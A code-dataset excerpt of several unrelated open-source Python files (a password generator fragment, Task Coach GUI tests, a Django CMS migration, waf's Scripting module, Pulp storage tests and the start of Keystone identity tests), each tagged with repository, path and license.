alternate_hands = sys.argv[2] == 'alt'
if not alternate_hands:
print "USAGE:"
print sys.argv[0], "[length of password]",
print "[alt (if you want the password to alternate hands]"
except:
alternate_hands = False
for i in range(passwordLength):
if not alternate_hands:
sys.stdout.write( rng.choice(allchars) )
else:
if i%2:
sys.stdout.write( rng.choice(lefthand) )
else:
sys.stdout.write( rng.choice(righthand) )
| ActiveState/code | recipes/Python/473852_Password_Generator/recipe-473852.py | Python | mit | 929 |
'''
Task Coach - Your friendly task manager
Copyright (C) 2004-2010 Task Coach developers <developers@taskcoach.org>
Task Coach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Task Coach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import wx, sys
import test
from taskcoachlib import gui, command, config, persistence
from taskcoachlib.domain import category, note, attachment
class CategoryEditorTestCase(test.wxTestCase):
def setUp(self):
super(CategoryEditorTestCase, self).setUp()
self.settings = config.Settings(load=False)
self.taskFile = persistence.TaskFile()
self.categories = self.taskFile.categories()
self.categories.extend(self.createCategories())
self.editor = self.createEditor()
def createEditor(self):
return gui.dialog.editor.CategoryEditor(self.frame, self.createCommand(),
self.settings, self.categories, self.taskFile, raiseDialog=False)
def tearDown(self):
# CategoryEditor uses CallAfter for setting the focus, make sure those
# calls are dealt with, otherwise they'll turn up in other tests
if '__WXMAC__' not in wx.PlatformInfo and ('__WXMSW__' not in wx.PlatformInfo or sys.version_info < (2, 5)):
wx.Yield() # pragma: no cover
super(CategoryEditorTestCase, self).tearDown()
def createCommand(self):
raise NotImplementedError # pragma: no cover
def createCategories(self):
return []
def setSubject(self, newSubject):
self.editor._interior[0].setSubject(newSubject)
def setDescription(self, newDescription):
self.editor._interior[0].setDescription(newDescription)
class NewCategoryTest(CategoryEditorTestCase):
def createCommand(self):
newCategoryCommand = command.NewCategoryCommand(self.categories)
self.category = newCategoryCommand.items[0] # pylint: disable-msg=W0201
return newCategoryCommand
def testCreate(self):
# pylint: disable-msg=W0212
self.assertEqual('New category', self.editor._interior[0]._subjectEntry.GetValue())
def testOk(self):
self.setSubject('Done')
self.editor.ok()
self.assertEqual('Done', self.category.subject())
def testCancel(self):
self.setSubject('Done')
self.editor.cancel()
self.assertEqual('New category', self.category.subject())
def testSetDescription(self):
self.setDescription('Description')
self.editor.ok()
self.assertEqual('Description', self.category.description())
def testAddNote(self):
self.editor._interior[1].notes.append(note.Note(subject='New note'))
self.editor.ok()
self.assertEqual(1, len(self.category.notes()))
class NewSubCategoryTest(CategoryEditorTestCase):
def createCommand(self):
newSubCategoryCommand = command.NewSubCategoryCommand(self.categories,
[self.category])
self.subCategory = newSubCategoryCommand.items[0] # pylint: disable-msg=W0201
return newSubCategoryCommand
def createCategories(self):
self.category = category.Category('Category') # pylint: disable-msg=W0201
return [self.category]
def testOk(self):
self.editor.ok()
self.assertEqual([self.subCategory], self.category.children())
def testCancel(self):
self.editor.cancel()
self.assertEqual([], self.category.children())
class EditCategoryTest(CategoryEditorTestCase):
def setUp(self):
super(EditCategoryTest, self).setUp()
self.setSubject('Done')
def createCommand(self):
return command.EditCategoryCommand(self.categories, [self.category])
# pylint: disable-msg=E1101
def createCategories(self):
# pylint: disable-msg=W0201
self.category = category.Category('Category to edit')
self.attachment = attachment.FileAttachment('some attachment')
self.category.addAttachments(self.attachment)
return [self.category]
def testOk(self):
self.editor.ok()
self.assertEqual('Done', self.category.subject())
def testCancel(self):
self.editor.cancel()
self.assertEqual('Category to edit', self.category.subject())
def testAddAttachment(self):
self.editor._interior[2].viewer.onDropFiles(None, ['filename'])
self.editor.ok()
self.failUnless('filename' in [att.location() for att in self.category.attachments()])
self.failUnless('filename' in [att.subject() for att in self.category.attachments()])
def testRemoveAttachment(self):
self.editor._interior[2].viewer.presentation().removeItems([self.attachment])
self.editor.ok()
self.assertEqual([], self.category.attachments())
| wdmchaft/taskcoach | tests/unittests/guiTests/CategoryEditorTest.py | Python | gpl-3.0 | 5,369 |
# -*- coding: utf-8 -*-
from south.db import db
from django.db import models
from cms.models import *
import datetime
class Migration:
def forwards(self, orm):
# Adding field 'Title.meta_keywords'
db.add_column('cms_title', 'meta_keywords', models.CharField(_("keywords"), max_length=255, blank=True, null=True))
# Adding field 'Title.meta_description'
db.add_column('cms_title', 'meta_description', models.TextField(_("description"), max_length=255, blank=True, null=True))
def backwards(self, orm):
# Deleting field 'Title.meta_keywords'
db.delete_column('cms_title', 'meta_keywords')
# Deleting field 'Title.meta_description'
db.delete_column('cms_title', 'meta_description')
models = {
'sites.site': {
'Meta': {'ordering': "('domain',)", 'db_table': "'django_site'"},
'_stub': True,
'id': ('models.AutoField', [], {'primary_key': 'True'})
},
'auth.user': {
'_stub': True,
'id': ('models.AutoField', [], {'primary_key': 'True'})
},
'cms.pagepermission': {
'can_change_softroot': ('models.BooleanField', ['_("can change soft-root")'], {'default': 'False'}),
'can_edit': ('models.BooleanField', ['_("can edit")'], {'default': 'True'}),
'can_publish': ('models.BooleanField', ['_("can publish")'], {'default': 'True'}),
'everybody': ('models.BooleanField', ['_("everybody")'], {'default': 'False'}),
'group': ('models.ForeignKey', ['Group'], {'null': 'True', 'blank': 'True'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'page': ('models.ForeignKey', ['Page'], {'null': 'True', 'blank': 'True'}),
'type': ('models.IntegerField', ['_("type")'], {'default': '0'}),
'user': ('models.ForeignKey', ['User'], {'null': 'True', 'blank': 'True'})
},
'cms.title': {
'Meta': {'unique_together': "(('language','page'),)"},
'application_urls': ('models.CharField', ["_('application')"], {'blank': 'True', 'max_length': '200', 'null': 'True', 'db_index': 'True'}),
'creation_date': ('models.DateTimeField', ['_("creation date")'], {'default': 'datetime.datetime.now', 'editable': 'False'}),
'has_url_overwrite': ('models.BooleanField', ['_("has url overwrite")'], {'default': 'False', 'editable': 'False', 'db_index': 'True'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'language': ('models.CharField', ['_("language")'], {'max_length': '3', 'db_index': 'True'}),
'meta_description': ('models.TextField', ['_("description")'], {'max_length': '255', 'blank': 'True', 'null':'True'}),
'meta_keywords': ('models.CharField', ['_("keywords")'], {'max_length': '255', 'blank': 'True', 'null':'True'}),
'page': ('models.ForeignKey', ['Page'], {'related_name': '"title_set"'}),
'path': ('models.CharField', ['_("path")'], {'max_length': '255', 'db_index': 'True'}),
'redirect': ('models.CharField', ['_("redirect")'], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('models.SlugField', ['_("slug")'], {'unique': 'False', 'max_length': '255', 'db_index': 'True'}),
'title': ('models.CharField', ['_("title")'], {'max_length': '255'})
},
'cms.cmsplugin': {
'creation_date': ('models.DateTimeField', ['_("creation date")'], {'default': 'datetime.datetime.now', 'editable': 'False'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'language': ('models.CharField', ['_("language")'], {'db_index': 'True', 'max_length': '3', 'editable': 'False', 'blank': 'False'}),
'level': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
'lft': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
'page': ('models.ForeignKey', ['Page'], {'editable': 'False'}),
'parent': ('models.ForeignKey', ['CMSPlugin'], {'null': 'True', 'editable': 'False', 'blank': 'True'}),
'placeholder': ('models.CharField', ['_("slot")'], {'max_length': '50', 'editable': 'False', 'db_index': 'True'}),
'plugin_type': ('models.CharField', ['_("plugin_name")'], {'max_length': '50', 'editable': 'False', 'db_index': 'True'}),
'position': ('models.PositiveSmallIntegerField', ['_("position")'], {'null': 'True', 'editable': 'False', 'blank': 'True'}),
'rght': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
'tree_id': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'})
},
'cms.page': {
'Meta': {'ordering': "('tree_id','lft')"},
'author': ('models.ForeignKey', ['User'], {'limit_choices_to': "{'page__isnull':False}"}),
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now', 'editable': 'False'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('models.BooleanField', ['_("in navigation")'], {'default': 'True', 'db_index': 'True'}),
'level': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
'lft': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
'login_required': ('models.BooleanField', ["_('login required')"], {'default': 'False'}),
'navigation_extenders': ('models.CharField', ['_("navigation extenders")'], {'blank': 'True', 'max_length': '80', 'null': 'True', 'db_index': 'True'}),
'parent': ('models.ForeignKey', ['Page'], {'db_index': 'True', 'related_name': "'children'", 'null': 'True', 'blank': 'True'}),
'publication_date': ('models.DateTimeField', ['_("publication date")'], {'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'publication_end_date': ('models.DateTimeField', ['_("publication end date")'], {'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'reverse_id': ('models.CharField', ['_("id")'], {'blank': 'True', 'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'rght': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
'sites': ('models.ManyToManyField', ['Site'], {}),
'soft_root': ('models.BooleanField', ['_("soft root")'], {'default': 'False', 'db_index': 'True'}),
'status': ('models.IntegerField', ['_("status")'], {'default': '0', 'db_index': 'True'}),
'template': ('models.CharField', ['_("template")'], {'max_length': '100'}),
'tree_id': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'})
},
'auth.group': {
'_stub': True,
'id': ('models.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['cms']
| team-xue/xue | xue/cms/migrations/0009_added_meta_fields.py | Python | bsd-3-clause | 7,114 |
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,shlex,shutil,traceback,errno,sys,stat
from waflib import Utils,Configure,Logs,Options,ConfigSet,Context,Errors,Build,Node
build_dir_override=None
no_climb_commands=['configure']
default_cmd="build"
def waf_entry_point(current_directory,version,wafdir):
Logs.init_log()
if Context.WAFVERSION!=version:
Logs.error('Waf script %r and library %r do not match (directory %r)'%(version,Context.WAFVERSION,wafdir))
sys.exit(1)
if'--version'in sys.argv:
Context.run_dir=current_directory
ctx=Context.create_context('options')
ctx.curdir=current_directory
ctx.parse_args()
sys.exit(0)
Context.waf_dir=wafdir
Context.launch_dir=current_directory
no_climb=os.environ.get('NOCLIMB',None)
if not no_climb:
for k in no_climb_commands:
if k in sys.argv:
no_climb=True
break
cur=current_directory
while cur:
lst=os.listdir(cur)
if Options.lockfile in lst:
env=ConfigSet.ConfigSet()
try:
env.load(os.path.join(cur,Options.lockfile))
ino=os.stat(cur)[stat.ST_INO]
except Exception:
pass
else:
for x in[env.run_dir,env.top_dir,env.out_dir]:
if Utils.is_win32:
if cur==x:
load=True
break
else:
try:
ino2=os.stat(x)[stat.ST_INO]
except OSError:
pass
else:
if ino==ino2:
load=True
break
else:
Logs.warn('invalid lock file in %s'%cur)
load=False
if load:
Context.run_dir=env.run_dir
Context.top_dir=env.top_dir
Context.out_dir=env.out_dir
break
if not Context.run_dir:
if Context.WSCRIPT_FILE in lst:
Context.run_dir=cur
next=os.path.dirname(cur)
if next==cur:
break
cur=next
if no_climb:
break
if not Context.run_dir:
if'-h'in sys.argv or'--help'in sys.argv:
Logs.warn('No wscript file found: the help message may be incomplete')
Context.run_dir=current_directory
ctx=Context.create_context('options')
ctx.curdir=current_directory
ctx.parse_args()
sys.exit(0)
Logs.error('Waf: Run from a directory containing a file named %r'%Context.WSCRIPT_FILE)
sys.exit(1)
try:
os.chdir(Context.run_dir)
except OSError:
Logs.error('Waf: The folder %r is unreadable'%Context.run_dir)
sys.exit(1)
try:
set_main_module(Context.run_dir+os.sep+Context.WSCRIPT_FILE)
except Errors.WafError ,e:
Logs.pprint('RED',e.verbose_msg)
Logs.error(str(e))
sys.exit(1)
except Exception ,e:
Logs.error('Waf: The wscript in %r is unreadable'%Context.run_dir,e)
traceback.print_exc(file=sys.stdout)
sys.exit(2)
try:
run_commands()
except Errors.WafError ,e:
if Logs.verbose>1:
Logs.pprint('RED',e.verbose_msg)
Logs.error(e.msg)
sys.exit(1)
except SystemExit:
raise
except Exception ,e:
traceback.print_exc(file=sys.stdout)
sys.exit(2)
except KeyboardInterrupt:
Logs.pprint('RED','Interrupted')
sys.exit(68)
def set_main_module(file_path):
Context.g_module=Context.load_module(file_path)
Context.g_module.root_path=file_path
def set_def(obj):
name=obj.__name__
if not name in Context.g_module.__dict__:
setattr(Context.g_module,name,obj)
for k in[update,dist,distclean,distcheck,update]:
set_def(k)
if not'init'in Context.g_module.__dict__:
Context.g_module.init=Utils.nada
if not'shutdown'in Context.g_module.__dict__:
Context.g_module.shutdown=Utils.nada
if not'options'in Context.g_module.__dict__:
Context.g_module.options=Utils.nada
def parse_options():
Context.create_context('options').execute()
if not Options.commands:
Options.commands=[default_cmd]
Options.commands=[x for x in Options.commands if x!='options']
Logs.verbose=Options.options.verbose
Logs.init_log()
if Options.options.zones:
Logs.zones=Options.options.zones.split(',')
if not Logs.verbose:
Logs.verbose=1
elif Logs.verbose>0:
Logs.zones=['runner']
if Logs.verbose>2:
Logs.zones=['*']
def run_command(cmd_name):
ctx=Context.create_context(cmd_name)
ctx.log_timer=Utils.Timer()
ctx.options=Options.options
ctx.cmd=cmd_name
ctx.execute()
return ctx
def run_commands():
parse_options()
run_command('init')
while Options.commands:
cmd_name=Options.commands.pop(0)
ctx=run_command(cmd_name)
Logs.info('%r finished successfully (%s)'%(cmd_name,str(ctx.log_timer)))
run_command('shutdown')
def _can_distclean(name):
for k in'.o .moc .exe'.split():
if name.endswith(k):
return True
return False
def distclean_dir(dirname):
for(root,dirs,files)in os.walk(dirname):
for f in files:
if _can_distclean(f):
fname=root+os.sep+f
try:
os.unlink(fname)
except OSError:
Logs.warn('Could not remove %r'%fname)
for x in[Context.DBFILE,'config.log']:
try:
os.unlink(x)
except OSError:
pass
try:
shutil.rmtree('c4che')
except OSError:
pass
def distclean(ctx):
'''removes the build directory'''
lst=os.listdir('.')
for f in lst:
if f==Options.lockfile:
try:
proj=ConfigSet.ConfigSet(f)
except IOError:
Logs.warn('Could not read %r'%f)
continue
if proj['out_dir']!=proj['top_dir']:
try:
shutil.rmtree(proj['out_dir'])
except IOError:
pass
except OSError ,e:
if e.errno!=errno.ENOENT:
Logs.warn('project %r cannot be removed'%proj[Context.OUT])
else:
distclean_dir(proj['out_dir'])
for k in(proj['out_dir'],proj['top_dir'],proj['run_dir']):
try:
os.remove(os.path.join(k,Options.lockfile))
except OSError ,e:
if e.errno!=errno.ENOENT:
Logs.warn('file %r cannot be removed'%f)
if f.startswith('.waf')and not Options.commands:
shutil.rmtree(f,ignore_errors=True)
class Dist(Context.Context):
'''creates an archive containing the project source code'''
cmd='dist'
fun='dist'
algo='tar.bz2'
ext_algo={}
def execute(self):
self.recurse([os.path.dirname(Context.g_module.root_path)])
self.archive()
def archive(self):
import tarfile
arch_name=self.get_arch_name()
try:
self.base_path
except AttributeError:
self.base_path=self.path
node=self.base_path.make_node(arch_name)
try:
node.delete()
except Exception:
pass
files=self.get_files()
if self.algo.startswith('tar.'):
tar=tarfile.open(arch_name,'w:'+self.algo.replace('tar.',''))
for x in files:
self.add_tar_file(x,tar)
tar.close()
elif self.algo=='zip':
import zipfile
zip=zipfile.ZipFile(arch_name,'w',compression=zipfile.ZIP_DEFLATED)
for x in files:
archive_name=self.get_base_name()+'/'+x.path_from(self.base_path)
zip.write(x.abspath(),archive_name,zipfile.ZIP_DEFLATED)
zip.close()
else:
self.fatal('Valid algo types are tar.bz2, tar.gz or zip')
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
try:
digest=" (sha=%r)"%sha(node.read()).hexdigest()
except Exception:
digest=''
Logs.info('New archive created: %s%s'%(self.arch_name,digest))
def get_tar_path(self,node):
return node.abspath()
def add_tar_file(self,x,tar):
p=self.get_tar_path(x)
tinfo=tar.gettarinfo(name=p,arcname=self.get_tar_prefix()+'/'+x.path_from(self.base_path))
tinfo.uid=0
tinfo.gid=0
tinfo.uname='root'
tinfo.gname='root'
fu=None
try:
fu=open(p,'rb')
tar.addfile(tinfo,fileobj=fu)
finally:
if fu:
fu.close()
def get_tar_prefix(self):
try:
return self.tar_prefix
except AttributeError:
return self.get_base_name()
def get_arch_name(self):
try:
self.arch_name
except AttributeError:
self.arch_name=self.get_base_name()+'.'+self.ext_algo.get(self.algo,self.algo)
return self.arch_name
def get_base_name(self):
try:
self.base_name
except AttributeError:
appname=getattr(Context.g_module,Context.APPNAME,'noname')
version=getattr(Context.g_module,Context.VERSION,'1.0')
self.base_name=appname+'-'+version
return self.base_name
def get_excl(self):
try:
return self.excl
except AttributeError:
self.excl=Node.exclude_regs+' **/waf-1.7.* **/.waf-1.7* **/waf3-1.7.* **/.waf3-1.7* **/*~ **/*.rej **/*.orig **/*.pyc **/*.pyo **/*.bak **/*.swp **/.lock-w*'
nd=self.root.find_node(Context.out_dir)
if nd:
self.excl+=' '+nd.path_from(self.base_path)
return self.excl
def get_files(self):
try:
files=self.files
except AttributeError:
files=self.base_path.ant_glob('**/*',excl=self.get_excl())
return files
def dist(ctx):
'''makes a tarball for redistributing the sources'''
pass
class DistCheck(Dist):
fun='distcheck'
cmd='distcheck'
def execute(self):
self.recurse([os.path.dirname(Context.g_module.root_path)])
self.archive()
self.check()
def check(self):
import tempfile,tarfile
t=None
try:
t=tarfile.open(self.get_arch_name())
for x in t:
t.extract(x)
finally:
if t:
t.close()
cfg=[]
if Options.options.distcheck_args:
cfg=shlex.split(Options.options.distcheck_args)
else:
cfg=[x for x in sys.argv if x.startswith('-')]
instdir=tempfile.mkdtemp('.inst',self.get_base_name())
ret=Utils.subprocess.Popen([sys.argv[0],'configure','install','uninstall','--destdir='+instdir]+cfg,cwd=self.get_base_name()).wait()
if ret:
raise Errors.WafError('distcheck failed with code %i'%ret)
if os.path.exists(instdir):
raise Errors.WafError('distcheck succeeded, but files were left in %s'%instdir)
shutil.rmtree(self.get_base_name())
def distcheck(ctx):
'''checks if the project compiles (tarball from 'dist')'''
pass
def update(ctx):
'''updates the plugins from the *waflib/extras* directory'''
lst=Options.options.files.split(',')
if not lst:
lst=[x for x in Utils.listdir(Context.waf_dir+'/waflib/extras')if x.endswith('.py')]
for x in lst:
tool=x.replace('.py','')
try:
Configure.download_tool(tool,force=True,ctx=ctx)
except Errors.WafError:
Logs.error('Could not find the tool %s in the remote repository'%x)
def autoconfigure(execute_method):
def execute(self):
if not Configure.autoconfig:
return execute_method(self)
env=ConfigSet.ConfigSet()
do_config=False
try:
env.load(os.path.join(Context.top_dir,Options.lockfile))
except Exception:
Logs.warn('Configuring the project')
do_config=True
else:
if env.run_dir!=Context.run_dir:
do_config=True
else:
h=0
for f in env['files']:
h=hash((h,Utils.readf(f,'rb')))
do_config=h!=env.hash
if do_config:
Options.commands.insert(0,self.cmd)
Options.commands.insert(0,'configure')
return
return execute_method(self)
return execute
Build.BuildContext.execute=autoconfigure(Build.BuildContext.execute)
| bit-trade-one/SoundModuleAP | lib-src/lv2/sratom/waflib/Scripting.py | Python | gpl-2.0 | 10,970 |
import os
from errno import EEXIST, EPERM
from unittest import TestCase
from mock import Mock, patch
from pulp.server.content.storage import mkdir, ContentStorage, FileStorage, SharedStorage
class TestMkdir(TestCase):
@patch('os.makedirs')
def test_succeeded(self, _mkdir):
path = 'path-123'
mkdir(path)
_mkdir.assert_called_once_with(path)
@patch('os.makedirs')
def test_already_exists(self, _mkdir):
path = 'path-123'
mkdir(path)
_mkdir.assert_called_once_with(path)
_mkdir.side_effect = OSError(EEXIST, path)
@patch('os.makedirs')
def test_other_exception(self, _mkdir):
path = 'path-123'
mkdir(path)
_mkdir.side_effect = OSError(EPERM, path)
self.assertRaises(OSError, mkdir, path)
class TestContentStorage(TestCase):
def test_abstract(self):
storage = ContentStorage()
self.assertRaises(NotImplementedError, storage.put, None, None)
self.assertRaises(NotImplementedError, storage.get, None)
def test_open(self):
storage = ContentStorage()
storage.open()
def test_close(self):
storage = ContentStorage()
storage.close()
def test_enter(self):
storage = ContentStorage()
storage.open = Mock()
inst = storage.__enter__()
storage.open.assert_called_once_with()
self.assertEqual(inst, storage)
def test_exit(self):
storage = ContentStorage()
storage.close = Mock()
storage.__exit__()
storage.close.assert_called_once_with()
class TestFileStorage(TestCase):
@patch('pulp.server.content.storage.shutil')
@patch('pulp.server.content.storage.config')
@patch('os.path.isdir', Mock(return_value=True))
def test_put_dir(self, config, shutil):
path_in = '/tmp/test/'
storage_dir = '/tmp/storage'
unit = Mock(id='0123456789', unit_type_id='ABC')
config.get = lambda s, p: {'server': {'storage_dir': storage_dir}}[s][p]
storage = FileStorage()
# test
storage.put(unit, path_in)
# validation
destination = os.path.join(
os.path.join(storage_dir, 'content', 'units', unit.unit_type_id),
unit.id[0:4], unit.id)
shutil.copytree.assert_called_once_with(path_in, destination)
self.assertEqual(unit.storage_path, destination)
@patch('pulp.server.content.storage.shutil')
@patch('pulp.server.content.storage.config')
@patch('os.path.isdir', Mock(return_value=False))
def test_put_file(self, config, shutil):
path_in = '/tmp/test'
storage_dir = '/tmp/storage'
unit = Mock(id='0123456789', unit_type_id='ABC')
config.get = lambda s, p: {'server': {'storage_dir': storage_dir}}[s][p]
storage = FileStorage()
# test
storage.put(unit, path_in)
# validation
destination = os.path.join(
os.path.join(storage_dir, 'content', 'units', unit.unit_type_id),
unit.id[0:4], unit.id)
shutil.copy.assert_called_once_with(path_in, destination)
self.assertEqual(unit.storage_path, destination)
def test_get(self):
storage = FileStorage()
storage.get(None) # just for coverage
class TestSharedStorage(TestCase):
@patch('pulp.server.content.storage.sha256')
def test_init(self, sha256):
provider = 'git'
storage_id = '1234'
storage = SharedStorage(provider, storage_id)
sha256.assert_called_once_with(storage_id)
self.assertEqual(storage.storage_id, sha256.return_value.hexdigest.return_value)
self.assertEqual(storage.provider, provider)
@patch('pulp.server.content.storage.mkdir')
@patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
@patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
def test_open(self, _mkdir):
storage = SharedStorage('git', '1234')
storage.open()
self.assertEqual(
_mkdir.call_args_list,
[
((storage.content_dir,), {}),
((storage.links_dir,), {}),
])
@patch('pulp.server.content.storage.config')
def test_shared_dir(self, config):
storage_dir = '/tmp/storage'
config.get = lambda s, p: {'server': {'storage_dir': storage_dir}}[s][p]
storage = SharedStorage('git', '1234')
self.assertEqual(
storage.shared_dir,
os.path.join(storage_dir, 'content', 'shared', storage.provider, storage.storage_id))
@patch('pulp.server.content.storage.SharedStorage.shared_dir', 'abcd/')
def test_content_dir(self):
storage = SharedStorage('git', '1234')
self.assertEqual(
storage.content_dir,
os.path.join(storage.shared_dir, 'content'))
@patch('pulp.server.content.storage.SharedStorage.shared_dir', 'abcd/')
def test_links_dir(self):
storage = SharedStorage('git', '1234')
self.assertEqual(
storage.links_dir,
os.path.join(storage.shared_dir, 'links'))
def test_put(self):
unit = Mock()
storage = SharedStorage('git', '1234')
storage.link = Mock()
storage.put(unit)
storage.link.assert_called_once_with(unit)
def test_get(self):
storage = SharedStorage('git', '1234')
storage.get(None) # just for coverage
@patch('os.symlink')
@patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
@patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
def test_link(self, symlink):
unit = Mock(id='0123456789')
storage = SharedStorage('git', '1234')
# test
storage.link(unit)
# validation
expected_path = os.path.join(storage.links_dir, unit.id)
symlink.assert_called_once_with(storage.content_dir, expected_path)
self.assertEqual(unit.storage_path, expected_path)
@patch('os.symlink')
@patch('os.readlink')
@patch('os.path.islink')
@patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
@patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
def test_duplicate_link(self, islink, readlink, symlink):
unit = Mock(id='0123456789')
storage = SharedStorage('git', '1234')
islink.return_value = True
symlink.side_effect = OSError()
symlink.side_effect.errno = EEXIST
readlink.return_value = storage.content_dir
# test
storage.link(unit)
# note: not exception raised
# validation
expected_path = os.path.join(storage.links_dir, unit.id)
symlink.assert_called_once_with(storage.content_dir, expected_path)
self.assertEqual(unit.storage_path, expected_path)
@patch('os.symlink')
@patch('os.readlink')
@patch('os.path.islink')
@patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
@patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
def test_duplicate_nonlink(self, islink, readlink, symlink):
unit = Mock(id='0123456789')
storage = SharedStorage('git', '1234')
islink.return_value = False # not a link
symlink.side_effect = OSError()
symlink.side_effect.errno = EEXIST
readlink.return_value = storage.content_dir
# test
self.assertRaises(OSError, storage.link, unit)
# validation
expected_path = os.path.join(storage.links_dir, unit.id)
symlink.assert_called_once_with(storage.content_dir, expected_path)
@patch('os.symlink')
@patch('os.readlink')
@patch('os.path.islink')
@patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
@patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
def test_different_link_target(self, islink, readlink, symlink):
unit = Mock(id='0123456789')
storage = SharedStorage('git', '1234')
islink.return_value = True
symlink.side_effect = OSError()
symlink.side_effect.errno = EEXIST
readlink.return_value = 'different link target'
# test
self.assertRaises(OSError, storage.link, unit)
# validation
expected_path = os.path.join(storage.links_dir, unit.id)
symlink.assert_called_once_with(storage.content_dir, expected_path)
@patch('os.symlink')
@patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
@patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
def test_link_failed(self, symlink):
unit = Mock(id='0123456789')
storage = SharedStorage('git', '1234')
symlink.side_effect = OSError()
symlink.side_effect.errno = EPERM
self.assertRaises(OSError, storage.link, unit)
| mibanescu/pulp | server/test/unit/server/content/test_storage.py | Python | gpl-2.0 | 8,916 |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import fixtures
import mock
from oslo_log import log
from six.moves import http_client
from testtools import matchers
from keystone.common import controller
import keystone.conf
from keystone import exception
from keystone.tests import unit
from keystone.tests.unit import test_v3
CONF = keystone.conf.CONF
# NOTE(morganfainberg): To be removed when admin_token_auth middleware is
# removed. This was moved to it's own testcase so it can setup the
# admin_token_auth pipeline without impacting other tests.
class IdentityTestCaseStaticAdminToken(test_v3.RestfulTestCase):
EXTENSION_TO_ADD = 'admin_token_auth'
def config_overrides(self):
super(IdentityTestCaseStaticAdminToken, self).config_overrides()
self.config_fixture.config(
admin_token='ADMIN')
def test_list_users_with_static_admin_token_and_multiple_backends(self):
# domain-specific operations with the bootstrap ADMIN token is
# disallowed when domain-specific drivers are enabled
self.config_fixture.config(group='identity',
domain_specific_drivers_enabled=True)
self.get('/users', token=CONF.admin_token,
expected_status=exception.Unauthorized.code)
def test_create_user_with_admin_token_and_no_domain(self):
"""Call ``POST /users`` with admin token but no domain id.
It should not be possible to use the admin token to create a user
while not explicitly passing the domain in the request body.
"""
# Passing a valid domain id to new_user_ref() since domain_id is
# not an optional parameter.
ref = unit.new_user_ref(domain_id=self.domain_id)
# Delete the domain id before sending the request.
del ref['domain_id']
self.post('/users', body={'user': ref}, token=CONF.admin_token,
expected_status=http_client.BAD_REQUEST)
class IdentityTestCase(test_v3.RestfulTestCase):
"""Test users and groups."""
def setUp(self):
super(IdentityTestCase, self).setUp()
self.group = unit.new_group_ref(domain_id=self.domain_id)
self.group = self.identity_api.create_group(self.group)
self.group_id = self.group['id']
self.credential = unit.new_credential_ref(
user_id=self.user['id'],
project_id=self.project_id)
self.credential_api.create_credential(self.credential['id'],
self.credential)
# user crud tests
def test_create_user(self):
"""Call ``POST /users``."""
ref = unit.new_user_ref(domain_id=self.domain_id)
r = self.post(
'/users',
body={'user': ref})
return self.assertValidUserResponse(r, ref)
def test_create_user_without_domain(self):
"""Call ``POST /users`` without specifying domain.
According to the identity-api specification, if you do not
explicitly specific the domain_id in the entity, it should
take the domain scope of the token as the domain_id.
"""
# Create a user with a role on the domain so we can get a
# domain scoped token
domain = unit.new_domain_ref()
self.resource_api.create_domain(domain['id'], domain)
user = unit.create_user(self.identity_api, domain_id=domain['id'])
self.assignment_api.create_grant(
role_id=self.role_id, user_id=user['id'],
domain_id=domain['id'])
ref = unit.new_user_ref(domain_id=domain['id'])
ref_nd = ref.copy()
ref_nd.pop('domain_id')
auth = self.build_authentication_request(
user_id=user['id'],
password=user['password'],
domain_id=domain['id'])
r = self.post('/users', body={'user': ref_nd}, auth=auth)
self.assertValidUserResponse(r, ref)
# Now try the same thing without a domain token - which should fail
ref = unit.new_user_ref(domain_id=domain['id'])
ref_nd = ref.copy()
ref_nd.pop('domain_id')
auth = self.build_authentication_request(
user_id=self.user['id'],
password=self.user['password'],
project_id=self.project['id'])
# TODO(henry-nash): Due to bug #1283539 we currently automatically
# use the default domain_id if a domain scoped token is not being
# used. For now we just check that a deprecation warning has been
# issued. Change the code below to expect a failure once this bug is
# fixed.
